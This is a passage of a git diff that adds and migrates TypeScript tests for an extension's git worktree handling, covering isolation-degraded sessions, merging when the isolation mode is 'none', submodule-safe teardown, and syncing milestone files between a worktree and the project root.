+  assert.ok(
+    !warning!.msg.match(/retry\s+\/complete-milestone(?!\S)/),
+    "warning must not reference the non-existent /complete-milestone command",
+  );
+});
+
 // ─── mergeAndExit Tests (branch mode) ────────────────────────────────────────
 
 test("mergeAndExit in branch mode merges when on milestone branch", () => {
@@ -847,3 +881,116 @@ test("GitService is rebuilt with originalBasePath after exitMilestone", () => {
 
   assert.equal(gitServiceBasePath, "/project"); // project root, not worktree
 });
+
+// ─── Isolation Degradation Tests (#2483) ──────────────────────────────────
+
+test("enterMilestone sets isolationDegraded when worktree creation throws (#2483)", () => {
+  const s = makeSession();
+  const deps = makeDeps({
+    getAutoWorktreePath: () => null,
+    createAutoWorktree: () => {
+      throw new Error("empty repo");
+    },
+  });
+  const ctx = makeNotifyCtx();
+  const resolver = new WorktreeResolver(s, deps);
+
+  resolver.enterMilestone("M001", ctx);
+
+  assert.equal(s.isolationDegraded, true);
+  assert.equal(s.basePath, "/project"); // unchanged — error recovery
+});
+
+test("enterMilestone is no-op when isolationDegraded is true (#2483)", () => {
+  const s = makeSession();
+  s.isolationDegraded = true;
+  const deps = makeDeps();
+  const ctx = makeNotifyCtx();
+  const resolver = new WorktreeResolver(s, deps);
+
+  resolver.enterMilestone("M001", ctx);
+
+  assert.equal(s.basePath, "/project"); // unchanged
+  assert.equal(findCalls(deps.calls, "createAutoWorktree").length, 0);
+  assert.equal(findCalls(deps.calls, "enterAutoWorktree").length, 0);
+  assert.equal(findCalls(deps.calls, "shouldUseWorktreeIsolation").length, 0);
+});
+
+test("mergeAndExit is no-op when isolationDegraded is true (#2483)", () => {
+  const s = makeSession({
+    basePath: "/project",
+    originalBasePath: "/project",
+  });
+  s.isolationDegraded = true;
+  const deps = makeDeps({
+    getIsolationMode: () => "worktree",
+  });
+  const ctx = makeNotifyCtx();
+  const resolver = new WorktreeResolver(s, deps);
+
+  resolver.mergeAndExit("M001", ctx);
+
+  assert.equal(findCalls(deps.calls, "mergeMilestoneToMain").length, 0);
+  assert.equal(findCalls(deps.calls, "teardownAutoWorktree").length, 0);
+  assert.equal(findCalls(deps.calls, "getIsolationMode").length, 0);
+  assert.ok(
+    ctx.messages.some(
+      (m) => m.level === "info" && m.msg.includes("isolation was degraded"),
+    ),
+  );
+});
+
+test("isolationDegraded is reset by session.reset() (#2483)", () => {
+  const s = new AutoSession();
+  s.isolationDegraded = true;
+
+  s.reset();
+
+  assert.equal(s.isolationDegraded, false);
+});
+
+// ─── #2625 — Default isolation mode change must not orphan worktree commits ──
+
+test("mergeAndExit still merges when mode is 'none' but session is in a worktree (#2625)", () => {
+  // Scenario: user upgraded from a version where default was "worktree" to one
+  // where default is "none". They have an active worktree with committed work.
+  // mergeAndExit must detect the active worktree and merge regardless of config.
+  const s = makeSession({
+    basePath: "/project/.gsd/worktrees/M001",
+    originalBasePath: "/project",
+  });
+  const deps = makeDeps({
+    isInAutoWorktree: () => true,
+    getIsolationMode: () => "none", // config says "none" — but we ARE in a worktree
+  });
+  const ctx = makeNotifyCtx();
+  const resolver = new WorktreeResolver(s, deps);
+
+  resolver.mergeAndExit("M001", ctx);
+
+  // Must still merge — not skip silently
+  assert.equal(findCalls(deps.calls, "mergeMilestoneToMain").length, 1,
+    "must call mergeMilestoneToMain even when isolation mode is 'none' but we are in a worktree");
+  assert.equal(s.basePath, "/project", "basePath must be restored to project root");
+  assert.ok(ctx.messages.some((m) => m.msg.includes("merged to main")),
+    "must notify about the merge");
+});
+
+test("mergeAndExit in none mode remains a no-op when NOT in a worktree (#2625)", () => {
+  // When mode is "none" and we are genuinely not in a worktree, it should still be a no-op.
+  const s = makeSession({
+    basePath: "/project",
+    originalBasePath: "/project",
+  });
+  const deps = makeDeps({
+    isInAutoWorktree: () => false,
+    getIsolationMode: () => "none",
+  });
+  const ctx = makeNotifyCtx();
+  const resolver = new WorktreeResolver(s, deps);
+
+  resolver.mergeAndExit("M001", ctx);
+
+  assert.equal(findCalls(deps.calls, "mergeMilestoneToMain").length, 0,
+    "must NOT merge when not in a worktree and mode is none");
+});
diff --git a/src/resources/extensions/gsd/tests/worktree-submodule-safety.test.ts b/src/resources/extensions/gsd/tests/worktree-submodule-safety.test.ts
new file mode 100644
index 000000000..7414705f5
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/worktree-submodule-safety.test.ts
@@ -0,0 +1,65 @@
+/**
+ * worktree-submodule-safety.test.ts — #2337
+ *
+ * Worktree teardown (removeWorktree) uses --force which destroys
+ * uncommitted changes in submodule directories. This test verifies
+ * that the removal logic detects submodules and preserves their state.
+ */
+
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertTrue, report } = createTestContext();
+
+const srcPath = join(import.meta.dirname, "..", "worktree-manager.ts");
+const src = readFileSync(srcPath, "utf-8");
+
+console.log("\n=== #2337: Worktree teardown preserves submodule state ===");
+
+// ── Test 1: removeWorktree function exists ──────────────────────────────
+
+const removeWorktreeIdx = src.indexOf("export function removeWorktree");
+assertTrue(removeWorktreeIdx > 0, "worktree-manager.ts exports removeWorktree");
+
+const fnBody = src.slice(removeWorktreeIdx, removeWorktreeIdx + 6000);
+
+// ── Test 2: The function checks for submodules before force removal ─────
+
+const checksSubmodules =
+  fnBody.includes("submodule") ||
+  fnBody.includes(".gitmodules");
+
+assertTrue(
+  checksSubmodules,
+  "removeWorktree checks for submodules before force removal (#2337)",
+);
+
+// ── Test 3: Submodule changes are stashed or warned about ───────────────
+
+const preservesSubmoduleState =
+  fnBody.includes("stash") ||
+  fnBody.includes("uncommitted") ||
+  fnBody.includes("dirty") ||
+  fnBody.includes("submodule") && (fnBody.includes("warn") || fnBody.includes("preserv"));
+
+assertTrue(
+  preservesSubmoduleState,
+  "removeWorktree preserves or warns about submodule uncommitted changes (#2337)",
+);
+
+// ── Test 4: Force removal is skipped when submodules have changes ───────
+
+// The key fix: when submodules have dirty state, we should NOT use force
+// removal. Instead, use non-force first and fall back to force only after
+// submodule state is preserved.
+const hasConditionalForce =
+  fnBody.includes("submodule") &&
+  (fnBody.includes("force") || fnBody.includes("--force"));
+
+assertTrue(
+  hasConditionalForce,
+  "removeWorktree has conditional force logic around submodules (#2337)",
+);
+
+report();
diff --git a/src/resources/extensions/gsd/tests/worktree-symlink-removal.test.ts b/src/resources/extensions/gsd/tests/worktree-symlink-removal.test.ts
index f92f719e0..b63d5dd7b 100644
--- a/src/resources/extensions/gsd/tests/worktree-symlink-removal.test.ts
+++ b/src/resources/extensions/gsd/tests/worktree-symlink-removal.test.ts
@@ -20,9 +20,9 @@ import {
   listWorktrees,
   worktreePath,
 } from "../worktree-manager.ts";
-import { createTestContext } from './test-helpers.ts';
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 
 function run(command: string, cwd: string): string {
   return execSync(command, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
@@ -46,8 +46,8 @@ mkdirSync(join(externalState, "worktrees"), { recursive: true });
 symlinkSync(externalState, join(base, ".gsd"));
 
 // Verify the symlink is in place
-assertTrue(existsSync(join(base, ".gsd")), ".gsd symlink exists");
-assertTrue(
+assert.ok(existsSync(join(base, ".gsd")), ".gsd symlink exists");
+assert.ok(
   realpathSync(join(base, ".gsd")) === externalState,
   ".gsd resolves to external state dir",
 );
@@ -57,28 +57,28 @@ writeFileSync(join(base, "README.md"), "# Test\n", "utf-8");
 run("git add .", base);
 run('git commit -m "init"', base);
 
-async function main(): Promise<void> {
+describe('worktree-symlink-removal', async () => {
   console.log("\n=== #1852: removeWorktree with symlinked .gsd/ ===");
 
   // Create a worktree — git will resolve the symlink and register
   // the worktree at the external path
   const info = createWorktree(base, "M002", { branch: "milestone/M002" });
-  assertTrue(info.exists, "worktree created");
+  assert.ok(info.exists, "worktree created");
 
   // Verify worktree was created at the resolved (external) path
   const realWtPath = realpathSync(info.path);
-  assertTrue(
+  assert.ok(
     realWtPath.startsWith(externalState),
     `worktree real path (${realWtPath}) is under external state dir`,
   );
 
   // Verify git registered the worktree
   const gitList = run("git worktree list", base);
-  assertTrue(gitList.includes("M002"), "git worktree list shows M002");
+  assert.ok(gitList.includes("M002"), "git worktree list shows M002");
 
   // The computed path via worktreePath uses the symlink path
   const computedPath = worktreePath(base, "M002");
-  assertTrue(existsSync(computedPath), "computed path exists (via symlink)");
+  assert.ok(existsSync(computedPath), "computed path exists (via symlink)");
 
   // Simulate what syncStateToProjectRoot does: replace the .gsd symlink with
   // a real directory containing stale worktree data. This causes worktreePath()
@@ -93,8 +93,8 @@ async function main(): Promise<void> {
   // Now worktreePath(base, "M002") points to the LOCAL stale dir, not the
   // external path where git actually registered the worktree.
   const stalePath = worktreePath(base, "M002");
-  assertTrue(existsSync(stalePath), "stale local worktree dir exists");
-  assertTrue(
+  assert.ok(existsSync(stalePath), "stale local worktree dir exists");
+  assert.ok(
     stalePath !== realWtPath,
     `computed path (${stalePath}) differs from git-registered path (${realWtPath})`,
   );
@@ -105,36 +105,29 @@ async function main(): Promise<void> {
 
   // After removal, the worktree should be gone from git's list
   const gitListAfter = run("git worktree list", base);
-  assertTrue(
+  assert.ok(
     !gitListAfter.includes("M002"),
     "worktree removed from git worktree list after removeWorktree",
   );
 
   // The branch should be deleted
   const branches = run("git branch", base);
-  assertTrue(
+  assert.ok(
     !branches.includes("milestone/M002"),
     "milestone/M002 branch deleted after removeWorktree",
   );
 
   // The worktree directory should be gone
-  assertTrue(
+  assert.ok(
     !existsSync(realWtPath),
     "worktree directory removed from disk",
   );
 
   // List should be empty
   const listed = listWorktrees(base);
-  assertEq(listed.length, 0, "no worktrees listed after removal");
+  assert.deepStrictEqual(listed.length, 0, "no worktrees listed after removal");
 
   // Cleanup
   rmSync(base, { recursive: true, force: true });
   rmSync(externalState, { recursive: true, force: true });
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
 });
diff --git a/src/resources/extensions/gsd/tests/worktree-sync-milestones.test.ts b/src/resources/extensions/gsd/tests/worktree-sync-milestones.test.ts
index 9c5552a2c..57ebe3740 100644
--- a/src/resources/extensions/gsd/tests/worktree-sync-milestones.test.ts
+++ b/src/resources/extensions/gsd/tests/worktree-sync-milestones.test.ts
@@ -27,11 +27,11 @@ import { mkdtempSync, mkdirSync, writeFileSync, rmSync, existsSync, readFileSync
 import { join } from 'node:path';
 import { tmpdir } from 'node:os';
 
-import { syncProjectRootToWorktree } from '../auto-worktree-sync.ts';
+import { syncProjectRootToWorktree } from '../auto-worktree.ts';
 import { syncGsdStateToWorktree, syncWorktreeStateBack } from '../auto-worktree.ts';
-import { createTestContext } from './test-helpers.ts';
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertTrue, report } = createTestContext();
 
 function createBase(name: string): string {
   const base = mkdtempSync(join(tmpdir(), `gsd-wt-sync-${name}-`));
@@ -43,7 +43,7 @@ function cleanup(base: string): void {
   rmSync(base, { recursive: true, force: true });
 }
 
-async function main(): Promise<void> {
+describe('worktree-sync-milestones', async () => {
 
   // ─── 1. Milestone directory synced from main to worktree ──────────────
   console.log('\n=== 1. milestone directory synced from main to worktree ===');
@@ -58,13 +58,13 @@ async function main(): Promise<void> {
       writeFileSync(join(m001Dir, 'M001-ROADMAP.md'), '# Roadmap');
 
       // Worktree has no M001
-      assertTrue(!existsSync(join(wtBase, '.gsd', 'milestones', 'M001')), 'M001 missing before sync');
+      assert.ok(!existsSync(join(wtBase, '.gsd', 'milestones', 'M001')), 'M001 missing before sync');
 
       syncProjectRootToWorktree(mainBase, wtBase, 'M001');
 
-      assertTrue(existsSync(join(wtBase, '.gsd', 'milestones', 'M001')), '#1311: M001 synced to worktree');
-      assertTrue(existsSync(join(wtBase, '.gsd', 'milestones', 'M001', 'M001-CONTEXT.md')), 'M001 CONTEXT synced');
-      assertTrue(existsSync(join(wtBase, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md')), 'M001 ROADMAP synced');
+      assert.ok(existsSync(join(wtBase, '.gsd', 'milestones', 'M001')), '#1311: M001 synced to worktree');
+      assert.ok(existsSync(join(wtBase, '.gsd', 'milestones', 'M001', 'M001-CONTEXT.md')), 'M001 CONTEXT synced');
+      assert.ok(existsSync(join(wtBase, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md')), 'M001 ROADMAP synced');
     } finally {
       cleanup(mainBase);
       cleanup(wtBase);
@@ -92,16 +92,16 @@ async function main(): Promise<void> {
 
       syncProjectRootToWorktree(mainBase, wtBase, 'M001');
 
-      assertTrue(existsSync(join(wtBase, '.gsd', 'milestones', 'M001', 'slices', 'S02')), '#1311: S02 synced');
-      assertTrue(existsSync(join(wtBase, '.gsd', 'milestones', 'M001', 'slices', 'S02', 'S02-PLAN.md')), 'S02 PLAN synced');
+      assert.ok(existsSync(join(wtBase, '.gsd', 'milestones', 'M001', 'slices', 'S02')), '#1311: S02 synced');
+      assert.ok(existsSync(join(wtBase, '.gsd', 'milestones', 'M001', 'slices', 'S02', 'S02-PLAN.md')), 'S02 PLAN synced');
     } finally {
       cleanup(mainBase);
       cleanup(wtBase);
     }
   }
 
-  // ─── 3. gsd.db deleted in worktree after sync ─────────────────────────
-  console.log('\n=== 3. gsd.db deleted in worktree after sync ===');
+  // ─── 3. empty gsd.db deleted in worktree after sync ────────────────────
+  console.log('\n=== 3. empty gsd.db deleted in worktree after sync ===');
   {
     const mainBase = createBase('main');
     const wtBase = createBase('wt');
@@ -111,13 +111,37 @@ async function main(): Promise<void> {
       mkdirSync(m001Dir, { recursive: true });
       writeFileSync(join(m001Dir, 'M001-ROADMAP.md'), '# Roadmap');
 
-      // Worktree has a stale gsd.db
-      writeFileSync(join(wtBase, '.gsd', 'gsd.db'), 'stale data');
-      assertTrue(existsSync(join(wtBase, '.gsd', 'gsd.db')), 'gsd.db exists before sync');
+      // Worktree has an empty (0-byte) gsd.db — stale/corrupt
+      writeFileSync(join(wtBase, '.gsd', 'gsd.db'), '');
+      assert.ok(existsSync(join(wtBase, '.gsd', 'gsd.db')), 'gsd.db exists before sync');
 
       syncProjectRootToWorktree(mainBase, wtBase, 'M001');
 
-      assertTrue(!existsSync(join(wtBase, '.gsd', 'gsd.db')), '#853: gsd.db deleted after sync');
+      assert.ok(!existsSync(join(wtBase, '.gsd', 'gsd.db')), '#853: empty gsd.db deleted after sync');
+    } finally {
+      cleanup(mainBase);
+      cleanup(wtBase);
+    }
+  }
+
+  // ─── 3b. non-empty gsd.db preserved in worktree after sync (#2815) ───
+  console.log('\n=== 3b. non-empty gsd.db preserved in worktree after sync (#2815) ===');
+  {
+    const mainBase = createBase('main');
+    const wtBase = createBase('wt');
+
+    try {
+      const m001Dir = join(mainBase, '.gsd', 'milestones', 'M001');
+      mkdirSync(m001Dir, { recursive: true });
+      writeFileSync(join(m001Dir, 'M001-ROADMAP.md'), '# Roadmap');
+
+      // Worktree has a populated gsd.db (e.g. from gsd-migrate on respawn)
+      writeFileSync(join(wtBase, '.gsd', 'gsd.db'), 'migrated-db-content');
+      assert.ok(existsSync(join(wtBase, '.gsd', 'gsd.db')), 'gsd.db exists before sync');
+
+      syncProjectRootToWorktree(mainBase, wtBase, 'M001');
+
+      assert.ok(existsSync(join(wtBase, '.gsd', 'gsd.db')), '#2815: non-empty gsd.db preserved after sync');
     } finally {
       cleanup(mainBase);
       cleanup(wtBase);
@@ -131,7 +155,7 @@ async function main(): Promise<void> {
     try {
       // Should not throw
       syncProjectRootToWorktree(base, base, 'M001');
-      assertTrue(true, 'no crash when paths are equal');
+      assert.ok(true, 'no crash when paths are equal');
     } finally {
       cleanup(base);
     }
@@ -144,7 +168,7 @@ async function main(): Promise<void> {
     const wtBase = createBase('wt');
     try {
       syncProjectRootToWorktree(mainBase, wtBase, null);
-      assertTrue(true, 'no crash when milestoneId is null');
+      assert.ok(true, 'no crash when milestoneId is null');
     } finally {
       cleanup(mainBase);
       cleanup(wtBase);
@@ -155,7 +179,7 @@ async function main(): Promise<void> {
   console.log('\n=== 6. non-existent directories → no-op ===');
   {
     syncProjectRootToWorktree('/tmp/does-not-exist-main', '/tmp/does-not-exist-wt', 'M001');
-    assertTrue(true, 'no crash on missing directories');
+    assert.ok(true, 'no crash on missing directories');
   }
 
   // ─── 7. milestones/ directory created in worktree when missing ────────
@@ -174,15 +198,15 @@ async function main(): Promise<void> {
       writeFileSync(join(m001Dir, 'M001-CONTEXT.md'), '# M001 Context');
       writeFileSync(join(m001Dir, 'M001-ROADMAP.md'), '# M001 Roadmap');
 
-      assertTrue(!existsSync(join(wtBase, '.gsd', 'milestones')), 'milestones/ missing before sync');
+      assert.ok(!existsSync(join(wtBase, '.gsd', 'milestones')), 'milestones/ missing before sync');
 
       const result = syncGsdStateToWorktree(mainBase, wtBase);
 
-      assertTrue(existsSync(join(wtBase, '.gsd', 'milestones')), 'milestones/ created in worktree');
-      assertTrue(existsSync(join(wtBase, '.gsd', 'milestones', 'M001')), 'M001 synced to worktree');
-      assertTrue(existsSync(join(wtBase, '.gsd', 'milestones', 'M001', 'M001-CONTEXT.md')), 'M001 CONTEXT synced');
-      assertTrue(existsSync(join(wtBase, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md')), 'M001 ROADMAP synced');
-      assertTrue(result.synced.length > 0, 'sync reported files');
+      assert.ok(existsSync(join(wtBase, '.gsd', 'milestones')), 'milestones/ created in worktree');
+      assert.ok(existsSync(join(wtBase, '.gsd', 'milestones', 'M001')), 'M001 synced to worktree');
+      assert.ok(existsSync(join(wtBase, '.gsd', 'milestones', 'M001', 'M001-CONTEXT.md')), 'M001 CONTEXT synced');
+      assert.ok(existsSync(join(wtBase, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md')), 'M001 ROADMAP synced');
+      assert.ok(result.synced.length > 0, 'sync reported files');
     } finally {
       cleanup(mainBase);
       rmSync(wtBase, { recursive: true, force: true });
@@ -197,7 +221,8 @@ async function main(): Promise<void> {
 
     try {
       // Build worktree milestone structure with slice-level and task-level files
-      const wtSliceDir = join(wtBase, '.gsd', 'milestones', 'M001', 'slices', 'S01');
+      // Use M002 as the milestone to sync, M001 as the "current" being merged (skipped)
+      const wtSliceDir = join(wtBase, '.gsd', 'milestones', 'M002', 'slices', 'S01');
       const wtTasksDir = join(wtSliceDir, 'tasks');
       mkdirSync(wtTasksDir, { recursive: true });
       writeFileSync(join(wtSliceDir, 'S01-SUMMARY.md'), '# S01 Summary');
@@ -205,26 +230,27 @@ async function main(): Promise<void> {
       writeFileSync(join(wtTasksDir, 'T02-SUMMARY.md'), '# T02 Summary');
 
       // Main project root starts with only the milestone directory (no slices yet)
-      mkdirSync(join(mainBase, '.gsd', 'milestones', 'M001'), { recursive: true });
+      mkdirSync(join(mainBase, '.gsd', 'milestones', 'M002'), { recursive: true });
 
+      // Pass M001 as milestoneId (the one being merged/skipped), M002 should still sync
       const { synced } = syncWorktreeStateBack(mainBase, wtBase, 'M001');
 
-      const mainSliceDir = join(mainBase, '.gsd', 'milestones', 'M001', 'slices', 'S01');
+      const mainSliceDir = join(mainBase, '.gsd', 'milestones', 'M002', 'slices', 'S01');
       const mainTasksDir = join(mainSliceDir, 'tasks');
 
-      assertTrue(
+      assert.ok(
         existsSync(join(mainSliceDir, 'S01-SUMMARY.md')),
         '#1678: slice SUMMARY synced to project root',
       );
-      assertTrue(
+      assert.ok(
         existsSync(join(mainTasksDir, 'T01-SUMMARY.md')),
         '#1678: task T01-SUMMARY synced to project root',
       );
-      assertTrue(
+      assert.ok(
         existsSync(join(mainTasksDir, 'T02-SUMMARY.md')),
         '#1678: task T02-SUMMARY synced to project root',
       );
-      assertTrue(
+      assert.ok(
         synced.some((p) => p.includes('tasks/T01-SUMMARY.md')),
         '#1678: task summary appears in synced list',
       );
@@ -257,27 +283,27 @@ async function main(): Promise<void> {
 
       // Root-level files should be overwritten with worktree versions
       const reqContent = readFileSync(join(mainBase, '.gsd', 'REQUIREMENTS.md'), 'utf-8');
-      assertTrue(
+      assert.ok(
         reqContent.includes('R002'),
         'REQUIREMENTS.md updated with worktree content',
       );
 
       const projContent = readFileSync(join(mainBase, '.gsd', 'PROJECT.md'), 'utf-8');
-      assertTrue(
+      assert.ok(
         projContent.includes('M002'),
         'PROJECT.md updated with worktree content',
       );
 
-      assertTrue(
+      assert.ok(
         existsSync(join(mainBase, '.gsd', 'KNOWLEDGE.md')),
         'KNOWLEDGE.md synced from worktree',
       );
 
-      assertTrue(
+      assert.ok(
         synced.includes('REQUIREMENTS.md'),
         'REQUIREMENTS.md appears in synced list',
       );
-      assertTrue(
+      assert.ok(
         synced.includes('PROJECT.md'),
         'PROJECT.md appears in synced list',
       );
@@ -308,35 +334,35 @@ async function main(): Promise<void> {
       writeFileSync(join(wtM002Dir, 'M002-abc123-ROADMAP.md'), '# M002 Roadmap');
 
       // Main has neither
-      assertTrue(
+      assert.ok(
         !existsSync(join(mainBase, '.gsd', 'milestones', 'M001')),
         'M001 missing in main before sync',
       );
-      assertTrue(
+      assert.ok(
         !existsSync(join(mainBase, '.gsd', 'milestones', 'M002-abc123')),
         'M002 missing in main before sync',
       );
 
-      // Sync with milestoneId = M001 (the current milestone)
+      // Sync with milestoneId = M001 (the current milestone being merged — skipped)
       const { synced } = syncWorktreeStateBack(mainBase, wtBase, 'M001');
 
-      // M001 should be synced (current milestone — always synced)
-      assertTrue(
-        existsSync(join(mainBase, '.gsd', 'milestones', 'M001', 'M001-SUMMARY.md')),
-        'M001 SUMMARY synced to main',
+      // M001 should be SKIPPED (current milestone being merged — #3641)
+      assert.ok(
+        !existsSync(join(mainBase, '.gsd', 'milestones', 'M001', 'M001-SUMMARY.md')),
+        'M001 SUMMARY NOT synced (current milestone skipped to prevent merge conflicts)',
       );
 
-      // M002 should ALSO be synced (next milestone — the fix)
-      assertTrue(
+      // M002 should be synced (other milestone — not skipped)
+      assert.ok(
         existsSync(join(mainBase, '.gsd', 'milestones', 'M002-abc123', 'M002-abc123-CONTEXT.md')),
         'M002 CONTEXT synced to main (next-milestone fix)',
       );
-      assertTrue(
+      assert.ok(
         existsSync(join(mainBase, '.gsd', 'milestones', 'M002-abc123', 'M002-abc123-ROADMAP.md')),
         'M002 ROADMAP synced to main (next-milestone fix)',
       );
 
-      assertTrue(
+      assert.ok(
         synced.some((p) => p.includes('M002-abc123')),
         'M002 appears in synced list',
       );
@@ -383,38 +409,35 @@ async function main(): Promise<void> {
       writeFileSync(join(wtBase, '.gsd', 'REQUIREMENTS.md'), '# Requirements\n## R001-R089\n## R090 — SCIM\n## R091 — WebAuthn');
       writeFileSync(join(wtBase, '.gsd', 'PROJECT.md'), '# Project\nMilestones: M001-M007');
 
-      // Sync with milestoneId = M006 (the completing milestone)
+      // Sync with milestoneId = M006 (the completing milestone — skipped by sync)
       const { synced } = syncWorktreeStateBack(mainBase, wtBase, 'M006-589wvh');
 
-      // Verify M006 artifacts synced
-      assertTrue(
-        existsSync(join(mainBase, '.gsd', 'milestones', 'M006-589wvh', 'M006-589wvh-SUMMARY.md')),
-        'M006 SUMMARY synced',
-      );
-      assertTrue(
-        existsSync(join(mainBase, '.gsd', 'milestones', 'M006-589wvh', 'slices', 'S01', 'S01-SUMMARY.md')),
-        'M006 S01 SUMMARY synced',
+      // M006 is the current milestone being merged — it should be SKIPPED (#3641)
+      // Its files are already in the milestone branch and would conflict with squash merge.
+      assert.ok(
+        !existsSync(join(mainBase, '.gsd', 'milestones', 'M006-589wvh', 'M006-589wvh-SUMMARY.md')),
+        'M006 SUMMARY NOT synced (current milestone skipped)',
       );
 
-      // Verify M007 artifacts synced (the critical fix)
-      assertTrue(
+      // Verify M007 artifacts synced (the critical fix — other milestones still sync)
+      assert.ok(
         existsSync(join(mainBase, '.gsd', 'milestones', 'M007-wortc8', 'M007-wortc8-CONTEXT.md')),
         'M007 CONTEXT synced to main (next-milestone)',
       );
-      assertTrue(
+      assert.ok(
         existsSync(join(mainBase, '.gsd', 'milestones', 'M007-wortc8', 'M007-wortc8-ROADMAP.md')),
         'M007 ROADMAP synced to main (next-milestone)',
       );
 
       // Verify root-level files updated
       const reqContent = readFileSync(join(mainBase, '.gsd', 'REQUIREMENTS.md'), 'utf-8');
-      assertTrue(
+      assert.ok(
         reqContent.includes('R090'),
         'REQUIREMENTS.md has R090 from worktree',
       );
 
       const projContent = readFileSync(join(mainBase, '.gsd', 'PROJECT.md'), 'utf-8');
-      assertTrue(
+      assert.ok(
         projContent.includes('M007'),
         'PROJECT.md has M007 from worktree',
       );
@@ -441,11 +464,11 @@ async function main(): Promise<void> {
 
       // Main's REQUIREMENTS should be untouched (worktree had nothing to sync)
       const content = readFileSync(join(mainBase, '.gsd', 'REQUIREMENTS.md'), 'utf-8');
-      assertTrue(
+      assert.ok(
         content === '# Original',
         'REQUIREMENTS.md unchanged when worktree has no copy',
       );
-      assertTrue(
+      assert.ok(
         !synced.includes('REQUIREMENTS.md'),
         'REQUIREMENTS.md not in synced list',
       );
@@ -473,11 +496,11 @@ async function main(): Promise<void> {
       );
 
       // Main has neither
-      assertTrue(
+      assert.ok(
         !existsSync(join(mainBase, '.gsd', 'QUEUE.md')),
         'QUEUE.md missing in main before sync',
       );
-      assertTrue(
+      assert.ok(
         !existsSync(join(mainBase, '.gsd', 'completed-units.json')),
         'completed-units.json missing in main before sync',
       );
@@ -485,31 +508,31 @@ async function main(): Promise<void> {
       const { synced } = syncWorktreeStateBack(mainBase, wtBase, 'M001');
 
       // QUEUE.md should be synced
-      assertTrue(
+      assert.ok(
         existsSync(join(mainBase, '.gsd', 'QUEUE.md')),
         '#1787: QUEUE.md synced from worktree to main',
       );
       const queueContent = readFileSync(join(mainBase, '.gsd', 'QUEUE.md'), 'utf-8');
-      assertTrue(
+      assert.ok(
         queueContent.includes('M002 next'),
         '#1787: QUEUE.md has correct content',
       );
-      assertTrue(
+      assert.ok(
         synced.includes('QUEUE.md'),
         '#1787: QUEUE.md appears in synced list',
       );
 
       // completed-units.json should be synced
-      assertTrue(
+      assert.ok(
         existsSync(join(mainBase, '.gsd', 'completed-units.json')),
         '#1787: completed-units.json synced from worktree to main',
       );
       const cuContent = readFileSync(join(mainBase, '.gsd', 'completed-units.json'), 'utf-8');
-      assertTrue(
+      assert.ok(
         cuContent.includes('M001-S01-T01'),
         '#1787: completed-units.json has correct content',
       );
-      assertTrue(
+      assert.ok(
         synced.includes('completed-units.json'),
         '#1787: completed-units.json appears in synced list',
       );
@@ -535,20 +558,20 @@ async function main(): Promise<void> {
       mkdirSync(suffixDir, { recursive: true });
       writeFileSync(join(suffixDir, 'M001-abc123-CONTEXT.md'), '# M001 Context');
 
-      assertTrue(!existsSync(join(wtBase, '.gsd', 'milestones', 'sprint-alpha')), 'sprint-alpha missing before sync');
-      assertTrue(!existsSync(join(wtBase, '.gsd', 'milestones', 'M001-abc123')), 'M001-abc123 missing before sync');
+      assert.ok(!existsSync(join(wtBase, '.gsd', 'milestones', 'sprint-alpha')), 'sprint-alpha missing before sync');
+      assert.ok(!existsSync(join(wtBase, '.gsd', 'milestones', 'M001-abc123')), 'M001-abc123 missing before sync');
 
       const result = syncGsdStateToWorktree(mainBase, wtBase);
 
-      assertTrue(
+      assert.ok(
         existsSync(join(wtBase, '.gsd', 'milestones', 'sprint-alpha', 'CONTEXT.md')),
         '#1547: non-standard milestone dir "sprint-alpha" synced to worktree',
       );
-      assertTrue(
+      assert.ok(
         existsSync(join(wtBase, '.gsd', 'milestones', 'M001-abc123', 'M001-abc123-CONTEXT.md')),
         '#1547: suffixed milestone dir "M001-abc123" synced to worktree',
       );
-      assertTrue(result.synced.length > 0, 'sync reported files');
+      assert.ok(result.synced.length > 0, 'sync reported files');
     } finally {
       cleanup(mainBase);
       cleanup(wtBase);
@@ -570,18 +593,18 @@ async function main(): Promise<void> {
       mkdirSync(wtCustomDir, { recursive: true });
       writeFileSync(join(wtCustomDir, 'SUMMARY.md'), '# Sprint Beta Summary');
 
-      assertTrue(
+      assert.ok(
         !existsSync(join(mainBase, '.gsd', 'milestones', 'sprint-beta')),
         'sprint-beta missing in main before sync',
       );
 
       const { synced } = syncWorktreeStateBack(mainBase, wtBase, 'M001');
 
-      assertTrue(
+      assert.ok(
         existsSync(join(mainBase, '.gsd', 'milestones', 'sprint-beta', 'SUMMARY.md')),
         '#1547: non-standard milestone dir "sprint-beta" synced back to main',
       );
-      assertTrue(
+      assert.ok(
         synced.some((p) => p.includes('sprint-beta')),
         '#1547: sprint-beta appears in synced list',
       );
@@ -590,11 +613,4 @@ async function main(): Promise<void> {
       rmSync(wtBase, { recursive: true, force: true });
     }
   }
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
 });
diff --git a/src/resources/extensions/gsd/tests/worktree-sync-overwrite-loop.test.ts b/src/resources/extensions/gsd/tests/worktree-sync-overwrite-loop.test.ts
new file mode 100644
index 000000000..fd297b5ee
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/worktree-sync-overwrite-loop.test.ts
@@ -0,0 +1,204 @@
+/**
+ * worktree-sync-overwrite-loop.test.ts — Regression tests for #1886.
+ *
+ * Reproduces the infinite validate-milestone loop caused by two bugs
+ * in syncProjectRootToWorktree:
+ *
+ * 1. safeCopyRecursive overwrites worktree-authoritative files (e.g.
+ *    VALIDATION.md written by validate-milestone gets clobbered by the
+ *    stale project root copy that lacks the file).
+ *
+ * 2. completed-units.json is not forward-synced from project root to
+ *    worktree, so the worktree never learns about already-completed units.
+ *
+ * Covers:
+ *   - syncProjectRootToWorktree does NOT overwrite existing worktree files
+ *   - syncProjectRootToWorktree copies files missing from the worktree
+ *   - completed-units.json is forward-synced from project root to worktree
